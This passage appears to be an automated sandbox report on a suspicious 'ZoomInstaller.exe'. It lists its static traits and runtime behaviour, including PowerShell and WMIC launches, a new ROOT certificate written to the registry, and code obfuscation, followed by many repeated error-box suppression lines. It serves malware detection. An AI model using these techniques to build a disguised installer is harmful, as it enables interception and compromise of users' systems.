Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: ZoomInstaller.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: ZoomInstaller.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: ZoomInstaller.exe Static file information: File size 22207488 > 1048576
Source: ZoomInstaller.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x3e6000
Source: ZoomInstaller.exe Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x30f000
Source: ZoomInstaller.exe Static PE information: Raw size of /19 is bigger than: 0x100000 < 0x4e8c00
Source: ZoomInstaller.exe Static PE information: Raw size of /45 is bigger than: 0x100000 < 0x203200
Source: ZoomInstaller.exe Static PE information: Raw size of /81 is bigger than: 0x100000 < 0x38fe00
Source: ZoomInstaller.exe Static PE information: Raw size of /92 is bigger than: 0x100000 < 0x112200
Source: ZoomInstaller.exe Static PE information: Raw size of /141 is bigger than: 0x100000 < 0x17ec00
Source: ZoomInstaller.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
PE file contains sections with non-standard names
Source: ZoomInstaller.exe Static PE information: section name: .xdata
Source: ZoomInstaller.exe Static PE information: section name: /4
Source: ZoomInstaller.exe Static PE information: section name: /19
Source: ZoomInstaller.exe Static PE information: section name: /31
Source: ZoomInstaller.exe Static PE information: section name: /45
Source: ZoomInstaller.exe Static PE information: section name: /57
Source: ZoomInstaller.exe Static PE information: section name: /70
Source: ZoomInstaller.exe Static PE information: section name: /81
Source: ZoomInstaller.exe Static PE information: section name: /92
Source: ZoomInstaller.exe Static PE information: section name: /106
Source: ZoomInstaller.exe Static PE information: section name: /125
Source: ZoomInstaller.exe Static PE information: section name: /141
Source: ZoomInstaller.exe Static PE information: section name: /157
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 17_2_00007FFD9BAD1D9F push esp; iretd 17_2_00007FFD9BAD2043

Persistence and Installation Behavior
barindex
Installs new ROOT certificates
Source: C:\Users\user\Desktop\ZoomInstaller.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\ZoomInstaller.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Stores large binary data to the registry
Source: C:\Users\user\Desktop\ZoomInstaller.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Users\user\Desktop\ZoomInstaller.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
